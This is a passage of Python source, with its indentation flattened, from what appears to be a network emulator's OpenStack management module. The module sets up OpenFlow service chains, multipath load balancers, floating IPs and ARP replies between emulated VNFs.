network chains or load balancers.
"""
__instance = None
def __new__(cls):
if OpenstackManage.__instance is None:
OpenstackManage.__instance = object.__new__(cls)
return OpenstackManage.__instance
def __init__(self, ip="0.0.0.0", port=4000):
# we are a singleton, only initialize once!
self.lock = threading.Lock()
with self.lock:
if hasattr(self, "init"):
return
self.init = True
self.endpoints = dict()
self.cookies = set()
self.cookies.add(0)
self.ip = ip
self.port = port
self._net = None
# to keep track which src_vnf(input port on the switch) handles a load
# balancer
self.lb_flow_cookies = dict()
self.chain_flow_cookies = dict()
# for the visualization also store the complete chain data incl. paths
self.full_chain_data = dict()
self.full_lb_data = dict()
# flow groups could be handled for each switch separately, but this global group counter should be easier to
# debug and to maintain
self.flow_groups = dict()
# we want one global chain api. this should not be datacenter
# dependent!
self.chain = chain_api.ChainApi(ip, port, self)
self.thread = threading.Thread(target=self.chain._start_flask, args=())
self.thread.name = self.chain.__class__
self.thread.start()
# floating ip network setup
self.floating_switch = None
self.floating_network = None
self.floating_netmask = "192.168.100.0/24"
self.floating_nodes = dict()
self.floating_cookies = dict()
self.floating_intf = None
self.floating_links = dict()
def stop(self):
self.chain.stop()
self.thread.join()
@property
def net(self):
return self._net
@net.setter
def net(self, value):
if self._net is None:
self._net = value
# create default networks
self.init_floating_network()
self._net = value
def init_floating_network(self, name="default"):
"""
Initialize the floating network component for the emulator.
Will not do anything if already initialized.
"""
if self.net is not None and self.floating_switch is None:
# create a floating network
fn = self.floating_network = Net(name)
fn.id = str(uuid.uuid4())
fn.set_cidr(self.floating_netmask)
# create a subnet
fn.subnet_id = str(uuid.uuid4())
fn.subnet_name = fn.name + "-sub"
# create a port for the host
port = Port("root-port")
# port.id = str(uuid.uuid4())
port.net_name = fn.name
# get next free ip
root_ip = fn.get_new_ip_address(port.name)
port.ip_address = root_ip
# floating ip network setup
            # weird way of getting a datacenter object
first_dc = self.net.dcs.values()[0]
# set a dpid for the switch. for this we have to get the id of the
# next possible dc
self.floating_switch = self.net.addSwitch(
"fs1", dpid=hex(first_dc._get_next_dc_dpid())[2:])
# this is the interface appearing on the physical host
self.floating_root = Node('root', inNamespace=False)
self.net.hosts.append(self.floating_root)
self.net.nameToNode['root'] = self.floating_root
self.floating_intf = self.net.addLink(
self.floating_root, self.floating_switch).intf1
self.floating_root.setIP(root_ip, intf=self.floating_intf)
self.floating_nodes[(self.floating_root.name,
root_ip)] = self.floating_root
def stop_floating_network(self):
self._net = None
self.floating_switch = None
def add_endpoint(self, ep):
"""
Registers an openstack endpoint with manage
:param ep: Openstack API endpoint
:type ep: :class:`heat.openstack_api_endpoint`
"""
key = "%s:%s" % (ep.ip, ep.port)
self.endpoints[key] = ep
def get_cookie(self):
"""
Get an unused cookie.
:return: Cookie
:rtype: ``int``
"""
cookie = int(max(self.cookies) + 1)
self.cookies.add(cookie)
return cookie
def get_flow_group(self, src_vnf_name, src_vnf_interface):
"""
        Gets a free group that is not currently used by any other flow for the specified interface / VNF.
:param src_vnf_name: Source VNF name
:type src_vnf_name: ``str``
:param src_vnf_interface: Source VNF interface name
:type src_vnf_interface: ``str``
:return: Flow group identifier.
:rtype: ``int``
"""
if (src_vnf_name, src_vnf_interface) not in self.flow_groups:
grp = int(len(self.flow_groups) + 1)
self.flow_groups[(src_vnf_name, src_vnf_interface)] = grp
else:
grp = self.flow_groups[(src_vnf_name, src_vnf_interface)]
return grp
def check_vnf_intf_pair(self, vnf_name, vnf_intf_name):
"""
Checks if a VNF exists and has the given interface
:param vnf_name: Name of the VNF to be checked
:type vnf_name: ``str``
        :param vnf_intf_name: Name of the interface that belongs to the VNF
:type vnf_intf_name: ``str``
:return: ``True`` if it is valid pair, else ``False``
:rtype: ``bool``
"""
if vnf_name in self.net:
vnf = self.net.getNodeByName(vnf_name)
return vnf_intf_name in vnf.nameToIntf
def network_action_start(self, vnf_src_name, vnf_dst_name, **kwargs):
"""
Starts a network chain for a source destination pair
:param vnf_src_name: Name of the source VNF
:type vnf_src_name: ``str``
        :param vnf_dst_name: Name of the destination VNF
:type vnf_dst_name: ``str``
:param \**kwargs: See below
:Keyword Arguments:
* *vnf_src_interface* (``str``): Name of source interface.
* *vnf_dst_interface* (``str``): Name of destination interface.
* *weight* (``int``): This value is fed into the shortest path computation if no path is specified.
* *match* (``str``): A custom match entry for the openflow flow rules. Only vlanid or port possible.
* *bidirectional* (``bool``): If set the chain will be set in both directions, else it will just set up \
from source to destination.
* *cookie* (``int``): Cookie value used by openflow. Used to identify the flows in the switches to be \
able to modify the correct flows.
* *no_route* (``bool``): If set a layer 3 route to the target interface will not be set up.
:return: The cookie chosen for the flow.
:rtype: ``int``
"""
try:
vnf_src_interface = kwargs.get('vnf_src_interface')
vnf_dst_interface = kwargs.get('vnf_dst_interface')
layer2 = kwargs.get('layer2', True)
match = kwargs.get('match')
flow = (vnf_src_name, vnf_src_interface,
vnf_dst_name, vnf_dst_interface)
if flow in self.chain_flow_cookies:
raise Exception(
"There is already a chain at the specified src/dst pair!")
# set up a layer 2 chain, this allows multiple chains for the same
# interface
src_node = self.net.getNodeByName(vnf_src_name)
dst_node = self.net.getNodeByName(vnf_dst_name)
dst_intf = dst_node.intf(vnf_dst_interface)
if layer2:
switch, inport = self._get_connected_switch_data(
vnf_src_name, vnf_src_interface)
self.setup_arp_reply_at(
switch, inport, dst_intf.IP(), dst_intf.MAC())
if isinstance(match, str):
match += ",dl_dst=%s" % dst_intf.MAC()
else:
match = "dl_dst=%s" % dst_intf.MAC()
cookie = kwargs.get('cookie', self.get_cookie())
self.cookies.add(cookie)
self.net.setChain(
vnf_src_name, vnf_dst_name,
vnf_src_interface=vnf_src_interface,
vnf_dst_interface=vnf_dst_interface,
cmd='add-flow',
weight=kwargs.get('weight'),
match=match,
bidirectional=False,
cookie=cookie,
path=kwargs.get('path'))
            # to keep this logic separate from the core son-emu, do the
            # housekeeping here
data = dict()
data["src_vnf"] = vnf_src_name
data["src_intf"] = vnf_src_interface
data["dst_vnf"] = vnf_dst_name
data["dst_intf"] = vnf_dst_interface
data["cookie"] = cookie
data["layer2"] = layer2
if kwargs.get('path') is not None:
data["path"] = kwargs.get('path')
else:
data["path"] = self._get_path(vnf_src_name, vnf_dst_name, vnf_src_interface,
vnf_dst_interface)[0]
# add route to dst ip to this interface
# this might block on containers that are still setting up, so
# start a new thread
if not kwargs.get('no_route'):
# son_emu does not like concurrent commands for a container so we need to lock this if multiple chains
# on the same interface are created
src_node.setHostRoute(dst_node.intf(
vnf_dst_interface).IP(), vnf_src_interface)
try:
son_emu_data = json.loads(
self.get_son_emu_chain_data(vnf_src_name))
except BaseException:
son_emu_data = dict()
if "son_emu_data" not in son_emu_data:
son_emu_data["son_emu_data"] = dict()
if "interfaces" not in son_emu_data["son_emu_data"]:
son_emu_data["son_emu_data"]["interfaces"] = dict()
if vnf_src_interface not in son_emu_data["son_emu_data"]["interfaces"]:
son_emu_data["son_emu_data"]["interfaces"][vnf_src_interface] = list()
son_emu_data["son_emu_data"]["interfaces"][vnf_src_interface].append(
dst_intf.IP())
self.set_son_emu_chain_data(vnf_src_name, son_emu_data)
if kwargs.get('bidirectional', False):
# call the reverse direction
path = kwargs.get('path')
if path is not None:
path = list(reversed(path))
self.network_action_start(vnf_dst_name, vnf_src_name, vnf_src_interface=vnf_dst_interface,
vnf_dst_interface=vnf_src_interface, bidirectional=False,
layer2=kwargs.get('layer2', False), path=path,
no_route=kwargs.get('no_route'))
self.full_chain_data[flow] = data
self.chain_flow_cookies[flow] = cookie
return cookie
except Exception as ex:
logging.exception("RPC error.")
raise Exception(ex.message)
def network_action_stop(self, vnf_src_name, vnf_dst_name, **kwargs):
"""
        Stops a network chain for a source destination pair
:param vnf_src_name: Name of the source VNF
:type vnf_src_name: ``str``
        :param vnf_dst_name: Name of the destination VNF
:type vnf_dst_name: ``str``
:param \**kwargs: See below
:Keyword Arguments:
* *vnf_src_interface* (``str``): Name of source interface.
* *vnf_dst_interface* (``str``): Name of destination interface.
* *bidirectional* (``bool``): If set the chain will be torn down in both directions, else it will just\
be torn down from source to destination.
* *cookie* (``int``): Cookie value used by openflow. Used to identify the flows in the switches to be \
able to modify the correct flows.
"""
try:
if 'cookie' in kwargs:
return self.delete_flow_by_cookie(kwargs.get('cookie'))
if kwargs.get('bidirectional', False):
self.delete_chain_by_intf(vnf_dst_name, kwargs.get('vnf_dst_interface'),
vnf_src_name, kwargs.get('vnf_src_interface'))
return self.delete_chain_by_intf(vnf_src_name, kwargs.get('vnf_src_interface'),
vnf_dst_name, kwargs.get('vnf_dst_interface'))
except Exception as ex:
logging.exception("RPC error.")
return ex.message
def set_son_emu_chain_data(self, vnf_name, data):
"""
Set son-emu chain data for this node.
:param vnf_name: The name of the vnf where the data is stored.
:type vnf_name: ``str``
:param data: Raw data to store on the node.
:type data: ``str``
"""
self.net.getNodeByName(vnf_name).cmd(
"echo \'%s\' > /tmp/son_emu_data.json" % json.dumps(data))
ip_list = []
for intf in data['son_emu_data']['interfaces'].values():
ip_list.extend(intf)
self.net.getNodeByName(vnf_name).cmd(
"echo \'%s\' > /tmp/son_emu_data" % "\n".join(ip_list))
def get_son_emu_chain_data(self, vnf_name):
"""
Get the current son-emu chain data set for this node.
:param vnf_name: The name of the vnf where the data is stored.
:type vnf_name: ``str``
:return: raw data stored on the node
:rtype: ``str``
"""
return self.net.getNodeByName(vnf_name).cmd(
"cat /tmp/son_emu_data.json")
def _get_connected_switch_data(self, vnf_name, vnf_interface):
"""
Get the switch an interface is connected to
:param vnf_name: Name of the VNF
:type vnf_name: ``str``
:param vnf_interface: Name of the VNF interface
:type vnf_interface: ``str``
:return: List containing the switch, and the inport number
:rtype: [``str``, ``int``]
"""
src_sw = None
src_sw_inport_nr = None
for connected_sw in self.net.DCNetwork_graph.neighbors(vnf_name):
link_dict = self.net.DCNetwork_graph[vnf_name][connected_sw]
for link in link_dict:
if (link_dict[link]['src_port_id'] == vnf_interface or
link_dict[link][
'src_port_name'] == vnf_interface):
# found the right link and connected switch
src_sw = connected_sw
src_sw_inport_nr = link_dict[link]['dst_port_nr']
break
return src_sw, src_sw_inport_nr
def _get_path(self, src_vnf, dst_vnf, src_vnf_intf, dst_vnf_intf):
"""
Own implementation of the get_path function from DCNetwork, because we just want the path and not set up
flows on the way.
:param src_vnf: Name of the source VNF
:type src_vnf: ``str``
:param dst_vnf: Name of the destination VNF
:type dst_vnf: ``str``
:param src_vnf_intf: Name of the source VNF interface
:type src_vnf_intf: ``str``
:param dst_vnf_intf: Name of the destination VNF interface
:type dst_vnf_intf: ``str``
:return: path, src_sw, dst_sw
:rtype: ``list``, ``str``, ``str``
"""
# modified version of the _chainAddFlow from
# emuvim.dcemulator.net._chainAddFlow
src_sw = None
dst_sw = None
logging.debug("Find shortest path from vnf %s to %s",
src_vnf, dst_vnf)
for connected_sw in self.net.DCNetwork_graph.neighbors(src_vnf):
link_dict = self.net.DCNetwork_graph[src_vnf][connected_sw]
for link in link_dict:
if (link_dict[link]['src_port_id'] == src_vnf_intf or
link_dict[link][
'src_port_name'] == src_vnf_intf):
# found the right link and connected switch
src_sw = connected_sw
break
for connected_sw in self.net.DCNetwork_graph.neighbors(dst_vnf):
link_dict = self.net.DCNetwork_graph[connected_sw][dst_vnf]
for link in link_dict:
if link_dict[link]['dst_port_id'] == dst_vnf_intf or \
link_dict[link][
'dst_port_name'] == dst_vnf_intf:
# found the right link and connected
dst_sw = connected_sw
break
logging.debug("From switch %s to %s " % (src_sw, dst_sw))
# get shortest path
try:
# returns the first found shortest path
# if all shortest paths are wanted, use: all_shortest_paths
path = nx.shortest_path(self.net.DCNetwork_graph, src_sw, dst_sw)
except BaseException:
logging.exception("No path could be found between {0} and {1} using src_sw={2} and dst_sw={3}".format(
src_vnf, dst_vnf, src_sw, dst_sw))
logging.debug("Graph nodes: %r" % self.net.DCNetwork_graph.nodes())
logging.debug("Graph edges: %r" % self.net.DCNetwork_graph.edges())
for e, v in self.net.DCNetwork_graph.edges():
logging.debug("%r" % self.net.DCNetwork_graph[e][v])
return "No path could be found between {0} and {1}".format(
src_vnf, dst_vnf)
logging.info("Shortest path between {0} and {1}: {2}".format(
src_vnf, dst_vnf, path))
return path, src_sw, dst_sw
def add_loadbalancer(self, src_vnf_name, src_vnf_interface, lb_data):
"""
This function will set up a loadbalancer at the given interface.
:param src_vnf_name: Name of the source VNF
:type src_vnf_name: ``str``
        :param src_vnf_interface: Name of the source VNF interface
:type src_vnf_interface: ``str``
:param lb_data: A dictionary containing the destination data as well as custom path settings
:type lb_data: ``dict``
:Example:
lbdata = {"dst_vnf_interfaces": {"dc2_man_web0": "port-man-2",
"dc3_man_web0": "port-man-4","dc4_man_web0": "port-man-6"}, "path": {"dc2_man_web0": {"port-man-2": [ "dc1.s1",\
"s1", "dc2.s1"]}}}
"""
net = self.net
src_sw_inport_nr = 0
src_sw = None
dest_intfs_mapping = lb_data.get('dst_vnf_interfaces', dict())
# a custom path can be specified as a list of switches
custom_paths = lb_data.get('path', dict())
dest_vnf_outport_nrs = list()
logging.debug("Call to add_loadbalancer at %s intfs:%s" %
(src_vnf_name, src_vnf_interface))
if not self.check_vnf_intf_pair(src_vnf_name, src_vnf_interface):
raise Exception(u"Source VNF %s or intfs %s does not exist" % (
src_vnf_name, src_vnf_interface))
# find the switch belonging to the source interface, as well as the
# inport nr
for connected_sw in net.DCNetwork_graph.neighbors(src_vnf_name):
link_dict = net.DCNetwork_graph[src_vnf_name][connected_sw]
for link in link_dict:
if link_dict[link]['src_port_name'] == src_vnf_interface:
src_sw = connected_sw
src_sw_inport_nr = link_dict[link]['dst_port_nr']
break
if src_sw is None or src_sw_inport_nr == 0:
raise Exception(u"Source VNF or interface can not be found.")
# get all target interface outport numbers
for vnf_name in dest_intfs_mapping:
if vnf_name not in net.DCNetwork_graph:
raise Exception(u"Target VNF %s is not known." % vnf_name)
for connected_sw in net.DCNetwork_graph.neighbors(vnf_name):
link_dict = net.DCNetwork_graph[vnf_name][connected_sw]
for link in link_dict:
if link_dict[link]['src_port_name'] == dest_intfs_mapping[vnf_name]:
dest_vnf_outport_nrs.append(
int(link_dict[link]['dst_port_nr']))
# get first switch
if (src_vnf_name, src_vnf_interface) not in self.lb_flow_cookies:
self.lb_flow_cookies[(src_vnf_name, src_vnf_interface)] = list()
src_ip = None
src_mac = None
for intf in net[src_vnf_name].intfs.values():
if intf.name == src_vnf_interface:
src_mac = intf.mac
src_ip = intf.ip
# set up paths for each destination vnf individually
index = 0
cookie = self.get_cookie()
main_cmd = "add-flow -OOpenFlow13"
self.lb_flow_cookies[(src_vnf_name, src_vnf_interface)].append(cookie)
# bookkeeping
data = dict()
data["src_vnf"] = src_vnf_name
data["src_intf"] = src_vnf_interface
data["paths"] = list()
data["cookie"] = cookie
# lb mac for src -> target connections
lb_mac = "31:33:70:%02x:%02x:%02x" % (random.randint(
0, 255), random.randint(0, 255), random.randint(0, 255))
# calculate lb ip as src_intf.ip +1
octets = src_ip.split('.')
octets[3] = str(int(octets[3]) + 1)
plus_one = '.'.join(octets)
# set up arp reply as well as add the route to the interface
self.setup_arp_reply_at(src_sw, src_sw_inport_nr,
plus_one, lb_mac, cookie=cookie)
net.getNodeByName(src_vnf_name).setHostRoute(
plus_one, src_vnf_interface)
for dst_vnf_name, dst_vnf_interface in dest_intfs_mapping.items():
path, src_sw, dst_sw = self._get_path(src_vnf_name, dst_vnf_name,
src_vnf_interface, dst_vnf_interface)
# use custom path if one is supplied
# json does not support hashing on tuples so we use nested dicts
if custom_paths is not None and dst_vnf_name in custom_paths:
if dst_vnf_interface in custom_paths[dst_vnf_name]:
path = custom_paths[dst_vnf_name][dst_vnf_interface]
logging.debug("Taking custom path from %s to %s: %s" % (
src_vnf_name, dst_vnf_name, path))
if not self.check_vnf_intf_pair(dst_vnf_name, dst_vnf_interface):
self.delete_loadbalancer(src_vnf_name, src_vnf_interface)
raise Exception(u"VNF %s or intfs %s does not exist" %
(dst_vnf_name, dst_vnf_interface))
if isinstance(path, dict):
self.delete_loadbalancer(src_vnf_name, src_vnf_interface)
                raise Exception(
                    u"Cannot find a valid path. Are you specifying the right interfaces?")
target_mac = "fa:17:00:03:13:37"
target_ip = "0.0.0.0"
for intf in net[dst_vnf_name].intfs.values():
if intf.name == dst_vnf_interface:
target_mac = str(intf.mac)
target_ip = str(intf.ip)
dst_sw_outport_nr = dest_vnf_outport_nrs[index]
current_hop = src_sw
switch_inport_nr = src_sw_inport_nr
# self.setup_arp_reply_at(src_sw, src_sw_inport_nr, target_ip, target_mac, cookie=cookie)
net.getNodeByName(dst_vnf_name).setHostRoute(
src_ip, dst_vnf_interface)
# choose free vlan if path contains more than 1 switch
if len(path) > 1:
vlan = net.vlans.pop()
if vlan == 0:
vlan = net.vlans.pop()
else:
vlan = None
single_flow_data = dict()
single_flow_data["dst_vnf"] = dst_vnf_name
single_flow_data["dst_intf"] = dst_vnf_interface
single_flow_data["path"] = path
single_flow_data["vlan"] = vlan
single_flow_data["cookie"] = cookie
data["paths"].append(single_flow_data)
# src to target
for i in range(0, len(path)):
if i < len(path) - 1:
next_hop = path[i + 1]
else:
# last switch reached
next_hop = dst_vnf_name
next_node = net.getNodeByName(next_hop)
if next_hop == dst_vnf_name:
switch_outport_nr = dst_sw_outport_nr
logging.info("end node reached: {0}".format(dst_vnf_name))
elif not isinstance(next_node, OVSSwitch):
logging.info(
"Next node: {0} is not a switch".format(next_hop))
return "Next node: {0} is not a switch".format(next_hop)
else:
# take first link between switches by default
index_edge_out = 0
switch_outport_nr = net.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']
cmd = 'priority=1,in_port=%s,cookie=%s' % (
switch_inport_nr, cookie)
cmd_back = 'priority=1,in_port=%s,cookie=%s' % (
switch_outport_nr, cookie)
# if a vlan is picked, the connection is routed through
# multiple switches
if vlan is not None:
if path.index(current_hop) == 0: # first node
# flow #index set up
cmd = 'in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % cookie
cmd += ',table=%s' % cookie
cmd += ',ip'
cmd += ',reg1=%s' % index
cmd += ',actions='
# set vlan id
cmd += ',push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd += ',set_field:%s->vlan_vid' % masked_vlan
cmd += ',set_field:%s->eth_dst' % target_mac
cmd += ',set_field:%s->ip_dst' % target_ip
cmd += ',output:%s' % switch_outport_nr
# last switch for reverse route
# remove any vlan tags
cmd_back += ',dl_vlan=%s' % vlan
cmd_back += ',actions=pop_vlan,output:%s' % switch_inport_nr
elif next_hop == dst_vnf_name: # last switch
# remove any vlan tags
cmd += ',dl_vlan=%s' % vlan
cmd += ',actions=pop_vlan,output:%s' % switch_outport_nr
                        # set up ARP replies at the port so the dst nodes know
# the src
self.setup_arp_reply_at(
current_hop, switch_outport_nr, src_ip, src_mac, cookie=cookie)
# reverse route
cmd_back = 'in_port=%s' % switch_outport_nr
cmd_back += ',cookie=%s' % cookie
cmd_back += ',ip'
cmd_back += ',actions='
cmd_back += 'push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd_back += ',set_field:%s->vlan_vid' % masked_vlan
cmd_back += ',set_field:%s->eth_src' % lb_mac
cmd_back += ',set_field:%s->ip_src' % plus_one
cmd_back += ',output:%s' % switch_inport_nr
else: # middle nodes
                        # if the path loops back over the same port (out port == in port) we must use IN_PORT explicitly,
                        # as OpenFlow drops packets that are output on the port they came in on
if switch_inport_nr == switch_outport_nr:
cmd += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
cmd_back += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
else:
cmd += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_outport_nr)
cmd_back += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_inport_nr)
# output the packet at the correct outport
else:
cmd = 'in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % cookie
cmd += ',table=%s' % cookie
cmd += ',ip'
cmd += ',reg1=%s' % index
cmd += ',actions='
cmd += ',set_field:%s->eth_dst' % target_mac
cmd += ',set_field:%s->ip_dst' % target_ip
cmd += ',output:%s' % switch_outport_nr
# reverse route
cmd_back = 'in_port=%s' % switch_outport_nr
cmd_back += ',cookie=%s' % cookie
cmd_back += ',ip'
cmd_back += ',actions='
cmd_back += ',set_field:%s->eth_src' % lb_mac
cmd_back += ',set_field:%s->ip_src' % plus_one
cmd_back += ',output:%s' % src_sw_inport_nr
self.setup_arp_reply_at(
current_hop, switch_outport_nr, src_ip, src_mac, cookie=cookie)
                # execute the command on the target switch
logging.debug(cmd)
cmd = "\"%s\"" % cmd
cmd_back = "\"%s\"" % cmd_back
net[current_hop].dpctl(main_cmd, cmd)
net[current_hop].dpctl(main_cmd, cmd_back)
# set next hop for the next iteration step
if isinstance(next_node, OVSSwitch):
switch_inport_nr = net.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']
current_hop = next_hop
# advance to next destination
index += 1
# set up the actual load balancing rule as a multipath on the very
# first switch
cmd = '"in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % (cookie)
cmd += ',ip'
cmd += ',actions='
# push 0x01 into the first register
cmd += 'load:0x1->NXM_NX_REG0[]'
# load balance modulo n over all dest interfaces
# TODO: in newer openvswitch implementations this should be changed to symmetric_l3l4+udp
# to balance any kind of traffic
cmd += ',multipath(symmetric_l4,1024,modulo_n,%s,0,NXM_NX_REG1[0..12])' % len(
dest_intfs_mapping)
# reuse the cookie as table entry as it will be unique
cmd += ',resubmit(, %s)"' % cookie
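        # For example, with src_sw_inport_nr=1, cookie=42 and three destination
        # interfaces the assembled flow reads (values illustrative):
        #   "in_port=1,cookie=42,ip,actions=load:0x1->NXM_NX_REG0[],
        #    multipath(symmetric_l4,1024,modulo_n,3,0,NXM_NX_REG1[0..12]),resubmit(, 42)"
        # multipath writes the selected bucket into REG1, and the resubmitted table
        # (numbered after the cookie) matches on reg1=<index> to pick one destination chain.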
# actually add the flow
logging.debug("Switch: %s, CMD: %s" % (src_sw, cmd))
net[src_sw].dpctl(main_cmd, cmd)
# finally add all flow data to the internal data storage
self.full_lb_data[(src_vnf_name, src_vnf_interface)] = data
def add_floating_lb(self, datacenter, lb_data):
"""
This function will set up a loadbalancer at the given datacenter.
        It returns the cookie and the floating IP assigned to the loadbalancer, as multiple loadbalancers are possible.
:param datacenter: The datacenter entrypoint
:type datacenter: ``str``
:param lb_data: A dictionary containing the destination data as well as custom path settings
:type lb_data: ``dict``
:Example:
lbdata = {"dst_vnf_interfaces": {"dc2_man_web0": "port-man-2",
"dc3_man_web0": "port-man-4","dc4_man_web0": "port-man-6"}, "path": {"dc2_man_web0": {"port-man-2": [ "dc1.s1",\
"s1", "dc2.s1"]}}}
"""
net = self.net
src_sw_inport_nr = 1
src_sw = self.floating_switch.name
dest_intfs_mapping = lb_data.get('dst_vnf_interfaces', dict())
# a custom path can be specified as a list of switches
custom_paths = lb_data.get('path', dict())
dest_vnf_outport_nrs = list()
if datacenter not in self.net.dcs:
raise Exception(u"Source datacenter can not be found.")
# get all target interface outport numbers
for vnf_name in dest_intfs_mapping:
if vnf_name not in net.DCNetwork_graph:
raise Exception(u"Target VNF %s is not known." % vnf_name)
for connected_sw in net.DCNetwork_graph.neighbors(vnf_name):
link_dict = net.DCNetwork_graph[vnf_name][connected_sw]
for link in link_dict:
if link_dict[link]['src_port_name'] == dest_intfs_mapping[vnf_name]:
dest_vnf_outport_nrs.append(
int(link_dict[link]['dst_port_nr']))
if len(dest_vnf_outport_nrs) == 0:
raise Exception(
"There are no paths specified for the loadbalancer")
src_ip = self.floating_intf.IP()
src_mac = self.floating_intf.MAC()
# set up paths for each destination vnf individually
index = 0
cookie = self.get_cookie()
main_cmd = "add-flow -OOpenFlow13"
floating_ip = self.floating_network.get_new_ip_address(
"floating-ip").split("/")[0]
for dst_vnf_name, dst_vnf_interface in dest_intfs_mapping.items():
path = None
# use custom path if one is supplied
# json does not support hashing on tuples so we use nested dicts
if custom_paths is not None and dst_vnf_name in custom_paths:
if dst_vnf_interface in custom_paths[dst_vnf_name]:
path = custom_paths[dst_vnf_name][dst_vnf_interface]
logging.debug("Taking custom path to %s: %s" %
(dst_vnf_name, path))
else:
if datacenter not in self.floating_links:
self.floating_links[datacenter] = \
net.addLink(self.floating_switch, datacenter)
path = \
self._get_path(self.floating_root.name, dst_vnf_name,
self.floating_intf.name, dst_vnf_interface)[0]
if isinstance(path, dict):
self.delete_flow_by_cookie(cookie)
                raise Exception(
                    u"Cannot find a valid path. Are you specifying the right interfaces?")
intf = net[dst_vnf_name].nameToIntf[dst_vnf_interface]
target_mac = str(intf.MAC())
target_ip = str(intf.IP())
dst_sw_outport_nr = dest_vnf_outport_nrs[index]
current_hop = src_sw
switch_inport_nr = src_sw_inport_nr
vlan = net.vlans.pop()
# iterate all switches on the path
for i in range(0, len(path)):
if i < len(path) - 1:
next_hop = path[i + 1]
else:
# last switch reached
next_hop = dst_vnf_name
next_node = net.getNodeByName(next_hop)
# sanity checks
if next_hop == dst_vnf_name:
switch_outport_nr = dst_sw_outport_nr
logging.info("end node reached: {0}".format(dst_vnf_name))
elif not isinstance(next_node, OVSSwitch):
logging.info(
"Next node: {0} is not a switch".format(next_hop))
return "Next node: {0} is not a switch".format(next_hop)
else:
# take first link between switches by default
index_edge_out = 0
switch_outport_nr = net.DCNetwork_graph[current_hop][next_hop][index_edge_out]['src_port_nr']
# default filters, just overwritten on the first node and last
# node
cmd = 'priority=1,in_port=%s,cookie=%s' % (
switch_inport_nr, cookie)
cmd_back = 'priority=1,in_port=%s,cookie=%s' % (
switch_outport_nr, cookie)
if i == 0: # first node
cmd = 'in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % cookie
cmd += ',table=%s' % cookie
cmd += ',ip'
cmd += ',ip_dst=%s' % floating_ip
cmd += ',reg1=%s' % index
cmd += ',actions='
# set vlan id
cmd += ',push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd += ',set_field:%s->vlan_vid' % masked_vlan
cmd += ',set_field:%s->eth_dst' % target_mac
cmd += ',set_field:%s->ip_dst' % target_ip
cmd += ',output:%s' % switch_outport_nr
# last switch for reverse route
# remove any vlan tags
cmd_back += ',dl_vlan=%s' % vlan
cmd_back += ',actions=pop_vlan,output:%s' % switch_inport_nr
self.setup_arp_reply_at(
current_hop, src_sw_inport_nr, floating_ip, target_mac, cookie=cookie)
elif next_hop == dst_vnf_name: # last switch
# remove any vlan tags
cmd += ',dl_vlan=%s' % vlan
cmd += ',actions=pop_vlan,output:%s' % switch_outport_nr
                    # set up ARP replies at the port so the dst nodes know the
# src
self.setup_arp_reply_at(
current_hop, switch_outport_nr, src_ip, src_mac, cookie=cookie)
# reverse route
cmd_back = 'in_port=%s' % switch_outport_nr
cmd_back += ',cookie=%s' % cookie
cmd_back += ',ip'
cmd_back += ',actions='
cmd_back += 'push_vlan:0x8100'
masked_vlan = vlan | 0x1000
cmd_back += ',set_field:%s->vlan_vid' % masked_vlan
cmd_back += ',set_field:%s->eth_src' % src_mac
cmd_back += ',set_field:%s->ip_src' % floating_ip
cmd_back += ',output:%s' % switch_inport_nr
net.getNodeByName(dst_vnf_name).setHostRoute(
src_ip, dst_vnf_interface)
else: # middle node
                    # if the path loops back over the same port (out port == in port) we must use IN_PORT explicitly,
                    # as OpenFlow drops packets that are output on the port they came in on
if switch_inport_nr == switch_outport_nr:
cmd += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
cmd_back += ',dl_vlan=%s,actions=IN_PORT' % (vlan)
else:
cmd += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_outport_nr)
cmd_back += ',dl_vlan=%s,actions=output:%s' % (
vlan, switch_inport_nr)
                # execute the command on the target switch
logging.debug(cmd)
cmd = "\"%s\"" % cmd
cmd_back = "\"%s\"" % cmd_back
net[current_hop].dpctl(main_cmd, cmd)
net[current_hop].dpctl(main_cmd, cmd_back)
# set next hop for the next iteration step
if isinstance(next_node, OVSSwitch):
switch_inport_nr = net.DCNetwork_graph[current_hop][next_hop][0]['dst_port_nr']
current_hop = next_hop
# advance to next destination
index += 1
# set up the actual load balancing rule as a multipath on the very
# first switch
cmd = '"in_port=%s' % src_sw_inport_nr
cmd += ',cookie=%s' % (cookie)
cmd += ',ip'
cmd += ',actions='
# push 0x01 into the first register
cmd += 'load:0x1->NXM_NX_REG0[]'
# load balance modulo n over all dest interfaces
# TODO: in newer openvswitch implementations this should be changed to symmetric_l3l4+udp
# to balance any kind of traffic
cmd += ',multipath(symmetric_l4,1024,modulo_n,%s,0,NXM_NX_REG1[0..12])' % len(
dest_intfs_mapping)
# reuse the cookie as table entry as it will be unique
cmd += ',resubmit(, %s)"' % cookie
# actually add the flow
logging.debug("Switch: %s, CMD: %s" % (src_sw, cmd))
net[src_sw].dpctl(main_cmd, cmd)
self.floating_cookies[cookie] = floating_ip
return cookie, floating_ip
def setup_arp_reply_at(self, switch, port_nr,
target_ip, target_mac, cookie=None):
"""
Sets up a custom ARP reply at a switch.
An ARP request coming in on the `port_nr` for `target_ip` will be answered with target IP/MAC.
:param switch: The switch belonging to the interface
:type switch: ``str``
:param port_nr: The port number at the switch that is connected to the interface
:type port_nr: ``int``
:param target_ip: The IP for which to set up the ARP reply
:type target_ip: ``str``
:param target_mac: The MAC address of the target interface
:type target_mac: ``str``
:param cookie: cookie to identify the ARP request, if None a new one will be picked
:type cookie: ``int`` or ``None``
:return: cookie
:rtype: ``int``
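        :Example:
            (switch, port and address values are illustrative)
            setup_arp_reply_at("dc1.s1", 1, "10.0.0.254", "fa:16:3e:00:00:01")
            installs a flow on dc1.s1 that answers ARP requests for 10.0.0.254 arriving on port 1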
"""
if cookie is None:
cookie = self.get_cookie()
